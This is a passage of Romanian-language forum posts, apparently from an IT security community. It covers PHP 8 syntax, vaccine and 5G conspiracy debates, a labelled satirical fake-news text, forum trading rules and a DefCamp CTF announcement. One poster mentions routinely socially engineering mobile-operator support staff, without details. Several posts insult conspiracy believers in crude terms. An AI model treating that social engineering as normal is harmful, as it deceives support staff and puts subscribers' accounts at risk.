) { $this->x = $x; $this->y = $y; $this->z = $z; } } // PHP 8 class Point { public function __construct( public float $x = 0.0, public float $y = 0.0, public float $z = 0.0, ) {} } PHP 8 Union types Instead of PHPDoc annotations for a combination of types, you can use native union type declarations that are validated at runtime. // PHP 7 class Number { /** @var int|float */ private $number; /** * @param float|int $number */ public function __construct($number) { $this->number = $number; } } new Number('NaN'); // Ok // PHP 8 class Number { public function __construct( private int|float $number ) {} } new Number('NaN'); // TypeError PHP 8 Nullsafe operator Instead of null check conditions, you can now use a chain of calls with the new nullsafe operator. When the evaluation of one element in the chain fails, the execution of the entire chain aborts and the entire chain evaluates to null. // PHP 7 $country = null; if ($session !== null) { $user = $session->user; if ($user !== null) { $address = $user->getAddress(); if ($address !== null) { $country = $address->country; } } } // PHP 8 $country = $session?->user?->getAddress()?->country; PHP 8 Match expression The new match is similar to switch and has the following features: Match is an expression, meaning its result can be stored in a variable or returned. Match branches only support single-line expressions and do not need a break; statement. Match does strict comparisons. // PHP 7 switch (8.0) { case '8.0': $result = "Oh no!"; break; case 8.0: $result = "This is what I expected"; break; } echo $result; //> Oh no! // PHP 8 echo match (8.0) { '8.0' => "Oh no!", 8.0 => "This is what I expected", }; //> This is what I expected Of course, these are just the highlights. Check out the official release announcement for all the details. Sursa: https://laravel-news.com/php-8

Sunt de acord cu ce zice, nimic nu poate fi 100% sigur indiferent de cati ani de teste s-ar face. Dar nu vad sa zica ca problemele apar din cauza ca se baga microchip-uri in vaccinuri sau ca provoaca autism. Eu la asta ma refeream. Probleme grave pot sa apara si de la pastile iar oamenii baga in ei cu pumnul pastile. Si nu ma refer la pastile "exotice", ci la orice fel de medicament. De aceea pe cam toate prospectele de la medicamente scrie lucruri de genul: "Nu luati daca sunteti alergici la tri-metil-benzeno-cortizol (termen fara sens inventat acum)" si multe alte contraindicatii. @RazvanDC Si eu pot sa zic niste lucruri legate de IT, cum ar fi: "Sistemul de operare Linux/Windows/Mac nu este sigur! Acesta contine un backdoor care ofera toate datele utilizatorilor guvernului american/rus/chinez! Nu mai folositi acest OS, este mai sigur pentru voi!" - As putea zice asta pentru diverse motive, cum ar fi pentru notorietate, sa apar in presa si sa devin vedeta, sau pentru bani, platit de vreuna dintre firmele concurente sau doar la caterinca si informatia sa ajunga mai departe. Ce zic eu ajunge la un medic, ma poate contrazica? Daca am experienta in IT, inseamna ca tot ce zic legat de domeniu e adevarat?

Lasand la o parte teoriile acelea retardate pe care doar analfabetii le pot crede cu chip-uri si mai stiu eu ce, in general vorbind, cred ca de fiecare data cand a aparut o noua tehnologie au aparut astfel de teorii. Am cautat intamplator pe Google si se pare ca 3G era periculos pentru sanatate (cum se zice acum referitor la 5G): https://www.dailymail.co.uk/health/article-198250/3G-mobile-masts-health-risk.html Am auzit acelasi lucru referitor la 4G de asemenea. Cat despre vaccinuri eu nu prea am mai auzit mizeria legata de faptul ca "provoaca autism". Autorul unui studiu fals referitor acest lucru a recunoscut ca a fost platit pentru a-l scrie (de parinti ai unor copii) si e posibil sa fi fost si inchis. Acum e la moda cu chip-urile. Are cineva idee de unde vine asta? Partea amuzanta e ca cei care cred asta sunt tocmai acele persoane care fac umbra pamantului degeaba, cu o inteligenta mult sub medie si fara prea multe realizari in viata. Se pare ca tocmai ei cred ca "marile interese" vor sa ii controleze. Ce sa faca cu ei? Nu stiu, sa ii puna la sapa. Dar pentru asta sunt de ajuns 10E pe zi, nu o tehnologie care nu va exista prea curand.

Foarte interesant articolul. Legat de cele 2 zile: "On January 11, researchers from China published the genetic sequence of the novel coronavirus. Two days later, Moderna's team and NIH scientists had finalized the targeted genetic sequence it would use in its vaccine" Deci o buna parte a problemei fusese deja rezolvata. Din moment ce tehnologia si cunostiintele existau de ani de zile, consider ca se putea "face" vaccinul si in 2 ore. Dar articolul chiar contine lucruri utile. mRNA FTW!

Vaccinul rusesc abia acum e la faza a III-a a testarii. Pfizer/BioNTech au trecut de aceasta faza cand au facut anuntul. E posibil sa fie functionale si vaccinurile chinezesti sau rusesti, problema cu ele e lipsa transparentei, dupa cum ai spus dar si numarul mic de teste efectuate. Desi si sunt complet pro-vaccinare, nici eu nu sunt de acord cu obligativitatea vaccinarii iar singurul motiv il reprezinta numarul mic de teste efectuate. Dar eu unul tot m-as vaccina si as face-o pe Zoom. Nu inteleg ce cifre se bat cap in cap. Nu am citit acel post lung plin de mizerii pentru ca nu voiam sa ma dau cu capul de pereti. Uitati mai jos un text, sa vedem daca il dati mai departe cum dati celelalte mizerii: "Un hacker cunoscut sub pseudoniul de @black_death_c4t a obtinut acces la servere Pfizer si a reusit sa decripteze genomul noului vaccin. Acesta a publicat analiza bio-moleculara a vaccinului pe platforma sa preferata de socializare, PornHub, unde datele sunt inca disponibile. Se pare ca vaccinul contine o substanta necunoscuta pe planeta si singura explicatie o reprezinta faptul ca acest vaccin este conceput de catre extraterestri pentru a prelua controlul omenirii. Cercetatorul doctorand in medicina genetica, doctorand in virusologie, @Nytro, a declarat ca a analizat rezultatele si ca de fapt hackerul era fumat si doar se uita la filme porno. Michael Jackson, medic primar la Universitatea din Kentuky alaturi de Colonelul Sanders au mentionat faptul ca numerele publicate nu sunt reale si ca sursa deceselor o reprezinta omenirea care foloseste prea mult sos de usturoi". Plm, gasiti un text cu niste nume "straine" si alte cacaturi fara logica si il luati de bun.

Engleza e importanta daca vrei o cariera in IT. Aveti aici un tutorial "basic" (adica de baza), pentru incepatori: https://9gag.com/gag/a9ngZ7j

https://arhiblog.ro/actioneaza-vaccinurile-covid/ PS: Articolul respectiv nu va fi citit de prea multa lume. Si oricand am incerca, nu vom reusi. Oamenii sunt prosti. Adica pula mea, Youtube Trending: https://www.youtube.com/feed/trending Cam asta se cauta pe o platforma in care puteti gasi filmulete despre virusuri, vaccinuri sau chiar cum functioneaza o bomba nucleara. E mai usor de inteles Jador sau Tzanca Uraganul.

Din cate citisem, vaccinurile din prezent functioneaza si in privinta mutatiei de la nurci. Dar cu trecerea timpului vor fi probabil mutatii care vor "bypassa" vaccinul. Desi cu noua tehnologie de producere (acel ARN mesager), cred ca se va gasi destul de rapid unul nou. Asa cum se intampla la gripa. De aceea vaccinurile antigripale "moderne" sunt tetravalente - adica acopera 4 tulpini ale virusului gripal.

Noi nu o sa facem niciodata escrow. Nu avem de ce. Fiecare, fie ca vreau sa vanda, fie ca vrea sa cumpere, ca pe OLX, isi asuma responsabilitatea. Noi cerem un minim de 50 de posturi tocmai pentru a stabili un minim nivel de incredere, de a vedea cam "ce poate" un user inainte de a face afaceri cu el. Dar in final, e decizia fiecaruia.

De obicei fac inginerie sociala pe cei de la support de la operatorul GSM, dar e probabil mai simplu asa, ca cei de la support sunt trainuiti pentru astfel de lucruri.

2020-12-05 09:00:00 UTC — 2020-12-07 09:00:00 UTC DefCamp Capture The Flag ( D-CTF) is the most shattering and rebellious security CTF competition in the Central Eastern Europe. Here, the most skilled hackers & IT geeks put their knowledge to the test and compete with the best CFT teams from all over the world to get in the shortlist of best top 10, and later on win the overall D-CTF competition or, die trying. DefCamp Capture the Flag is organised since 2011 with over 10,000 players joined since then in annual multi-staged event for anyone. There is one important rule though – hack before being hacked! Event Summary Format: Jeopardy Play format: Team only Genres: Crypto, Pwning, Reversing, Web, Miscellaneous … Language: English Access: Open / Free for everyone Difficulty: Entry Level - Easy - Medium - Hard - Insane Website: D-CTF Detalii: https://dctf2020.cyberedu.ro/

adragos e un tip foarte bun la CTF-uri. Din cate am inteles, in timpul CTF-ului nostru se mai desfasura un altul, iar unii au mers la acela. Ceva international. Da, suntem romani

Nu se poate din punct de vedere fizic. Exista tehnologii de incarcare "wireless", in general de la distante mici, prin inductie, dar exista si dispozitive care se pot incarca de la undele electromagnetice din camp (e.g. radio). Se poate, tehnologia exista si se foloseste pentru senzori LowPower, dar acea incarcare e EXTREM de mica. Fie telefonul nu arata corect cata baterie are (cel mai probabil), fie (desi cred ca e cam mult) acel APK, daca avea privilegiile necesare, putea schimba in orice procent incarcarea bateriei (doar afisare, nu avea cum sa o incarce).